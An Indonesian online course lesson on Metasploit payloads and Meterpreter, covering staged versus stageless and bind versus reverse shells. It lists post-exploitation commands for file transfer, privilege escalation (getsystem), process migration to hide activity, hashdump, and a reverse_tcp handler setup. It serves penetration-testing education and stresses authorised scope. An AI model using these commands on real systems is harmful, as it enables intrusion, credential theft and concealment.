0Pricing
Ethical Hacking Academy · Pelajaran

Payload dan Meterpreter

Shell pasca-eksploitasi

Payload dan Meterpreter adalah pelajaran Ethical Hacking Academy gratis di CoddyKit. Ini adalah pelajaran 3 dari 4. Kamu bisa membaca pelajaran lengkapnya di bawah secara gratis — lalu praktikkan langsung di browser dengan editor kode bawaan dan tutor AI 24/7. Ini adalah bagian dari jalur belajar Ethical Hacking Academy, dan progresmu tersinkronisasi di web dan aplikasi CoddyKit. Kursus Ethical Hacking Academy mencakup 4 pelajaran total.

Apa Itu Muatan?

Muatan adalah kode yang dijalankan pada target setelah sebuah eksploit berhasil. Muatan menentukan hal yang dapat Anda lakukan selanjutnya, mulai dari menjalankan satu perintah hingga membuka shell interaktif penuh.

Pemilihan muatan yang tepat bergantung pada OS target, pengaturan jaringan, dan tingkat akses yang Anda perlukan.

Bertahap vs Tanpa Tahap

Muatan tersedia dalam dua gaya pengiriman:

  • Bertahap (perhatikan / dalam meterpreter/reverse_tcp): mengirim rintisan kecil terlebih dahulu, yang kemudian mengunduh muatan lengkap. Jejak awalnya lebih kecil.
  • Tanpa tahap (perhatikan _ dalam meterpreter_reverse_tcp): seluruh muatan dikirim sekaligus. Lebih andal pada jaringan yang tidak stabil.

Shell Bind vs Reverse

Ada dua arah koneksi:

  • Shell bind: target membuka porta dan menunggu; Anda terhubung ke target tersebut. Sering kali diblokir oleh tembok api.
  • Shell reverse: target terhubung kembali kepada Anda (LHOST/LPORT). Cara ini biasanya dapat melewati tembok api yang mengizinkan koneksi keluar.

Karena alasan ini, muatan reverse biasanya menjadi bawaan umum.

Berkenalan dengan Meterpreter

Meterpreter adalah muatan lanjutan milik Metasploit. Berbeda dari shell perintah dasar, Meterpreter berjalan di dalam memori, berkomunikasi melalui saluran terenkripsi, dan menyediakan banyak perintah untuk pascaeksploitasi.

Karena tidak menulis ke penyimpanan, Meterpreter lebih tersamar daripada menaruh berkas eksekusi terpisah.

Perintah Inti Meterpreter

Setelah memiliki sesi Meterpreter, perintah-perintah dasar membantu Anda memahami kondisi target.

sysinfo      # OS, architecture, hostname
getuid       # current user context
ps           # running processes
pwd  ls  cd  # filesystem navigation

Transfer Berkas

Meterpreter memindahkan berkas antara mesin Anda dan target dengan perintah sederhana, yang berguna untuk mengambil bukti atau menyiapkan alat dalam pengujian yang berwenang.

download C:\\Users\\admin\\secret.txt /tmp/
upload /tmp/tool.exe C:\\Windows\\Temp\\

Beralih ke Shell Sistem

Perintah shell membawa Anda dari Meterpreter ke penerjemah perintah asli target (cmd.exe atau /bin/sh) saat Anda perlu menjalankan perintah tingkat OS secara langsung.

Ketik exit untuk kembali ke prompt Meterpreter tanpa kehilangan sesi.

shell
# C:\> whoami
# exit  -> back to meterpreter

Eskalasi Hak Akses

Anda sering kali memperoleh akses dengan hak terbatas. Meterpreter membantu melakukan eskalasi:

  • getsystem mencoba teknik-teknik yang telah diketahui untuk memperoleh SYSTEM di Windows.
  • Modul pascaeksploitasi local_exploit_suggester merekomendasikan eksploit eskalasi hak akses lokal untuk host tersebut.

Hak akses yang lebih tinggi membuka akses ke pengambilan kredensial dan akses yang lebih dalam.

getsystem
run post/multi/recon/local_exploit_suggester

Memigrasikan Proses

Sesi Anda berada di dalam sebuah proses. Jika proses tersebut tidak stabil atau kemungkinan besar dihentikan, gunakan migrate untuk berpindah ke proses yang lebih stabil dan berjalan lama agar sesi Anda tetap aktif.

Berpindah ke proses yang sesuai dengan tingkat hak akses Anda juga membantu menyamarkan aktivitas dan dapat mengubah konteks pengguna Anda.

ps
migrate 1340     # migrate into a stable PID

Mempertahankan Akses

Meterpreter menyediakan fitur untuk mengambil data yang berguna selama penilaian berwenang, seperti hashdump untuk mengumpulkan hash kata sandi dan alat pemindaian tombol untuk menunjukkan dampak pengambilan input.

Gunakan kemampuan tersebut hanya dalam ruang lingkup yang disepakati, dan dokumentasikan semuanya untuk laporan klien.

hashdump
run post/windows/gather/checkvm

Penangani

Muatan reverse memerlukan sesuatu yang mendengarkan di sisi Anda untuk menangkap koneksi. Modul multi/handler berfungsi sebagai penangkap tersebut. Konfigurasikan modul ini dengan muatan, LHOST, dan LPORT yang sama seperti yang digunakan untuk membuat muatan.

Hal ini penting saat Anda mengirimkan muatan msfvenom di luar konsol: jalankan penangani terlebih dahulu, lalu picu muatan pada target.

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.14.2
set LPORT 4444
exploit -j

Pemeriksaan Singkat

Pilih muatan yang dapat melewati tembok api yang ketat.

Rangkuman

Anda telah mempelajari muatan dan Meterpreter:

  • Muatan dapat berupa bertahap (/) atau tanpa tahap (_), serta bind atau reverse; reverse biasanya dapat melewati tembok api.
  • Meterpreter berjalan di dalam memori melalui saluran terenkripsi dengan banyak perintah.
  • Tugas inti: sysinfo, getuid, ps, download/upload, shell.
  • Lakukan eskalasi dengan getsystem dan local_exploit_suggester; gunakan migrate untuk stabilitas.
  • Gunakan fitur pengumpulan hanya dalam ruang lingkup yang diizinkan dan dokumentasikan semuanya.

Berikutnya: modul pascaeksploitasi, pivot, dan pengambilan data.

Pertanyaan yang Sering Diajukan

Apakah pelajaran “Payload dan Meterpreter” gratis?

Ya — teks lengkap “Payload dan Meterpreter” gratis dibaca di sini di web. Untuk praktiknya secara interaktif (editor kode bawaan dan tutor AI 24/7) dan buka sisa kursus Ethical Hacking Academy, upgrade ke CoddyKit PRO. Kursus Ethical Hacking Academy mencakup 4 pelajaran total.

Apa yang akan aku pelajari di “Payload dan Meterpreter”?

Shell pasca-eksploitasi Kamu berlatih Ethical Hacking Academy dengan kode praktik yang langsung kamu jalankan di browser, dan tutor AI 24/7 menjawab pertanyaanmu saat kamu mengerjakan pelajaran ini.

Apakah aku perlu pengalaman untuk memulai Ethical Hacking Academy?

Tidak diperlukan pengalaman sebelumnya. Ethical Hacking Academy di CoddyKit dirancang untuk pemula hingga pelajar tingkat lanjut, jadi kamu bisa memulai di sini atau dari awal dan belajar sesuai kecepatan kamu sendiri. Ini adalah pelajaran 3 dari 4.

Berapa lama pelajaran “Payload dan Meterpreter” memakan waktu?

Sebagian besar pelajaran CoddyKit memakan waktu sekitar 5–10 menit. Setiap pelajaran ringkas dan interaktif, jadi kamu membuat kemajuan stabil dan melanjutkan dari tempat kamu tinggalkan di web dan aplikasi.

Bisakah aku menulis dan menjalankan kode dalam pelajaran Ethical Hacking Academy ini?

Ya. Setiap pelajaran Ethical Hacking Academy menyertakan editor kode bawaan, jadi kamu menulis dan menjalankan kode nyata langsung di browser dan mendapatkan umpan balik AI instan — tidak diperlukan penyiapan lokal.

Semua pelajaran dalam kursus ini

  1. Arsitektur Metasploit
  2. Mencari dan Menggunakan Exploit
  3. Payload dan Meterpreter
  4. Modul Pasca-Eksploitasi
← Kembali ke Ethical Hacking Academy